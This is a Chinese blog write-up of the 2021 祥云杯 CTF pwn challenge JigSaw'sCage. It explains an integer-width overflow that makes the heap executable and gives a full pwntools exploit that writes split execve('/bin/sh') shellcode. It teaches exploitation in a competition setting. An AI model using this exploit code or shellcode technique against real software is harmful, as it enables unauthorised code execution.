2021祥云杯JigSaw‘sCage(有限制的shellcode)

已于 2022-10-19 19:34:01 修改
阅读量179 收藏
点赞数
分类专栏: PWN 文章标签: pwn
于 2022-10-19 19:28:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/127409290
版权

2021祥云杯JigSAW

保护全开

在sub_15F0函数存在溢出
scanf格式化字符%ld读的是long int ,v1是int,能溢出4个字节,我们溢出使v2大于0xE,给heap加0x1000长度的可读可写可执行权限
请添加图片描述

接着看test函数
请添加图片描述
对应的汇编
请添加图片描述
所以我们往堆里写shellcode就行,不过每次只能0x10-1,可以分两次去写入shellcode,用汇编相连

值得注意的是’\xc3’对应的汇编是ret
可以push rdx利用ret
不用ret也行,jmp rdx 即可

还有其他的做法,syscall一个read,利用当时的寄存器值,减少汇编可刚好达0x10长度,然后读入shellcode

exp:

from pwn import *
local_file  = './JigSAW'
local_libc  = './libc.so'
remote_libc = './libc.so'
select = 0
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
elif select == 1:
    r = remote('node4.buuoj.cn',25904 )
    libc = ELF(remote_libc)
else:
    r = gdb.debug(local_file)
    libc = ELF(local_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
def debug(cmd=''):
     gdb.attach(r,cmd)
#--------------------------
def add(idx):
    sla('Choice : \n','1')
    sla('Index? : \n',str(idx))
def edit(idx,content):
    sla('Choice : \n','2')
    sla('Index? : \n',str(idx))
    sa('iNput:\n',content)
def test(idx):
    sla('Choice : \n','4')
    sla('Index? : \n',str(idx))
#------------------------
sla('Name:\n','nq')
sla('Make your Choice:\n',str(0x100000000))
shell1=asm('''
        mov rbx, 0x68732f6e69622f        
        add rdx,0x20
        push rdx
        ''')
shell2=asm('''
        push rbx
        push rsp
        pop rdi
        xor esi, esi
        xor edx, edx
        push 0x3b
        pop rax
        syscall
        ''')
add(1)
add(2)
edit(1,shell1)
edit(2,shell2)
test(1)
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 624
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
2021 祥云 pwn-JigSaw’sCage
z1r0的博客
10-17 262
rdx是堆地址,rax是read的系统调用号,所以可以构造一个shellcode使得rdi为0,rsi为heap地址,rdx为0x1000,这样就是read(0, heap_addr, 0x1000)。v1是int,但scanf是ld,所以溢出了4个字节,这就导致了可以控制v2的值,这样只需要将v1改成0,v2改成大于14的值即可调用mprotect分配rwx权限到heap地址上。这道题属实是没有发现漏洞点在哪里,所以看了一下wm的wjh师傅的wp,发现漏洞出现下图。
2021 祥云 pwn JigSaw‘sCage
yongbaoii的博客
08-30 259
显然全绿。 libc给的是2.31的 进场画面简洁。 E9这个函数。 5148开了个空间,然后栈上写了个名字。 15f0这个函数首先引入眼帘的是 sysconf这个函数。 干嘛的? sysconf 函数用来获取系统执行的配置信息。例如页大小、最大页数、cpu个数、打开句柄的最大个数等等 我们在输入v1的时候可以看到,类型是ld,但是我们的v1只有四个字节,那么就会溢出4个字节给v2,那么就可以得到一块rwx的内存。地址就是我们的heap的地址。 add 就是申请 0x10的chunk。 edit 编写
2021祥云 CTF pwn解 wp
qq_39948058的博客
08-26 1170
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打IO——stdout,泄露libc基地址,再打的是reallochook为onegadget,然后进行申请获取rce exp: #coding:utf-8 from pwn import * context.log_level = "debug" p = process("./note") libc =
Byte-字节跳动-misc
wyj_1216 House
09-10 856
betgame you can input j or s or b. win me 30 times in 30 times! you will get the flag 解: 这是一道坑爹的找规律题~ j-剪刀 s-石头 b-布 第一次,出与对方出一样的时候,我方胜; 第二次,出与正常石头剪刀布赢得的规律相反的时候,我方胜; 第三次,出与正常石头剪刀布赢得的规律一致的时候,我方胜 循环进行~ 3...
ppic.rar_jigsaw
09-23
"ppic.rar_jigsaw" 是一个与拼图游戏相关的压缩包文件,它包含了制作或运行一个拼图游戏所需的各种资源和可能的源代码。这个游戏的独特之处在于它允许用户自行载入位图,这意味着玩家可以使用自己的图片作为拼图的...
vbp.rar_Cool_jigsaw
09-22
【标题】"vbp.rar_Cool_jigsaw" 提示我们这是一个与编程相关的压缩包,特别是与Visual Basic Project(VBP)文件有关。VBP文件是Microsoft Visual Basic应用程序的核心组成部分,它存储了工程的所有元数据,包括窗体...
skyblue_PinTu.zip_jigsaw_拼图
09-21
《skyblue_PinTu.zip_jigsaw_拼图》是一款基于编程技术实现的拼图游戏,主要涉及的技术点包括图像处理、算法设计以及用户交互界面。在这个项目中,开发者将一张完整的图片分割成多个小块,然后打乱顺序,用户需要...
compic.rar_Compic_jigsaw_visual c
09-19
总的来说,"Compic"项目是一个融合了编程技术、图形界面设计和算法运用的实例,对学习和提升C++编程、游戏开发以及计算机图形学等方面都有积极的意义。如果你对编程和拼图游戏有兴趣,不妨下载并研究这个项目,也许...
rengupintu.rar_flash 拼图_flash游戏拼图_jigsaw
09-24
标题“rengupintu.rar_flash 拼图_flash游戏拼图_jigsaw”指的是一个以Flash技术开发的拼图游戏,特别的是,这个游戏的主题似乎是人骨拼图,为用户提供了一种独特而富有挑战性的娱乐体验。在Flash开发领域,这样的...
大连海事大学第一届“启航”DLMU CTF部分题解
TMMXA的博客
12-13 1519
大连海事大学第一届“启航”CTF校园网络安全竞赛 签到题 0. dlmuctf2020 flag{welcome_to_dlmuctf2020} dlmuctf{welcome_to_dlmuctf2020} 1. 早安,贝丝人 TVJXRzI1TERPUlRIV1NCV09aU1Y2TlM3TTRZREFaQzdNUTNIU0lMNQ== ​ 很明显的Base64编码,解密后得到MRWG25LDORTHWSBWOZSV6NS7M4YDAZC7MQ3HSIL5,在进行Base32解码,拿到flag:dlm
一篇文章彻底清楚shellcode(精品)
weixin_51055545的博客
03-08 8966
shellcode 类题目 文章目录shellcode 类题目1.没开沙箱(此时我们可以系统调用get shell)picoctf_2018_shellcodemrctf2020_shellcode2.开启沙箱(orw读flag)gwctf_2019_shellcode 1.没开沙箱(此时我们可以系统调用get shell) (一)32位程序系统调用 32位程序有别于64位程序,32位通过栈传参,我们常用的寄存器有4个数据寄存器(eax,ebx,ecx,edx),2个变址寄存器(esi,edi),2个指针寄
syscall指令64位传参_Mac OS X下64位汇编与Linux下64位汇编的一些不同
weixin_34359680的博客
01-26 523
首先系统调用号大大的不同mac64和linux32的系统调用号也不同(虽然局部可能有相同)mac64的系统调用号在:/usr/include/sys/syscall.h可以查到,但是调用的时候其值要加上0x2000000,可以写一个宏处理:%define mk64 0x2000000+使用方式如下:mov rax,mk64 1 ;exit NOmov rdi,0 ;error_codesyscal...
linux下syscall函数传递参数,linux汇编:如何调用syscall?
weixin_29296241的博客
05-11 399
我想在汇编中调用一个系统调用.问题是我不能运行ecx,rsp. rsp是64位寄存器,ecx是32位寄存器.我想将缓冲区addr作为此系统调用的参数传递.我能做什么?谢谢.section .datas0: db "Largest basic function number supported:%s\n",0s0len: equ $-s0section .textglobal mainextern ...
syscall指令_[原创]简析syscall,sysret和sysenter,sysexit的具体过程
weixin_39627408的博客
12-28 1977
这里我以windows系统为例子,在其他系统实现方式是一样的.我们都知道xp系统是通过int 2E中断从用户态进入内核态的.,但xp系统之后windows都是通过系统快速调用从用户态进入内核态的.系统快速调用有两种:sysenter/sysexitsyscall/sysret前置知识MSRMSR(Model-Specific Register) 是一类寄存器,这类寄存器数量庞大,并且和处理器的mo...
64位BASM学习随笔(一)
闲人阿发伯的业余编程心得
03-15 9234
64位BASM学习随笔中的很多原则问题不仅仅适应Delphi,也适用其它64位程序语言,因为64位方式下,程序架构都是统一的。
push,你到底做了啥事情????
DevX's brew
04-21 4426
事情要一件一件来说,就像吃饭要一口一口吃一样。一共有两件事情,这节就先讲push的事情。 问一句,push, what the hell are u doing? 启动bochs,开始push stack之旅。 截取一部分源码: protect: ;[7].进入到保护模式后,为了给予内核最大的访问内存能力,ds段寄存器使用4G段描述符 ;初始化ds mov eax, 0x000
栈的使用(push、pop详解)学习笔记
热门推荐
weixin_42492218的博客
11-14 2万+
概念: 栈是一种数据结构,可以添加或者删除值,不过要遵循“后进先出”的原则。通过 push 操作把数据压入栈中,通过pop操作删除数据;它具有一个属性:弹出的值永远是最近被压入而且仍然在栈中的值。 栈可以实现为一个数组,总是从数组的一端插入和删除元素。这一端被称为栈顶。在x86-64中,程序栈存放在内存中某个区域。栈顶元素的地址是所有栈中元素地址中最低的。(根据惯例,我们的栈是倒过来画的,栈“顶”在图的底部。)栈指针%rsp保存着栈顶元素的地址。 PUSHQ与...
orw通用代码,最短shellcode
azraelxuemo的博客
04-02 1750
文章目录
jigsaw.init
最新发布
10-07
jigsaw.init是一个函数,用于初始化滑动拼图验证码组件。它有几个参数: - el: 表示需要插入滑动拼图验证码的元素的DOM对象。 - onChangeImgSrc: 一个数组,包含多张背景图片的路径。每次刷新验证码时,会从这些路径中随机选择一张作为背景图片。 - onSuccess: 当用户成功完成拼图验证时,会触发该回调函数。 - onFail: 当用户未能成功完成拼图验证时,会触发该回调函数。 - onRefresh: 当用户点击刷新按钮时,会触发该回调函数。 在HTML中,通常需要引入jigsaw.min.js和jigsaw.css文件,并在合适的位置插入滑动拼图验证码的容器元素。然后使用jigsaw.init函数来初始化该组件,并传入相应的参数。 请注意,以上代码片段可能是根据具体需求进行了修改和简化,实际使用时可能需要根据具体情况进行适当的调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值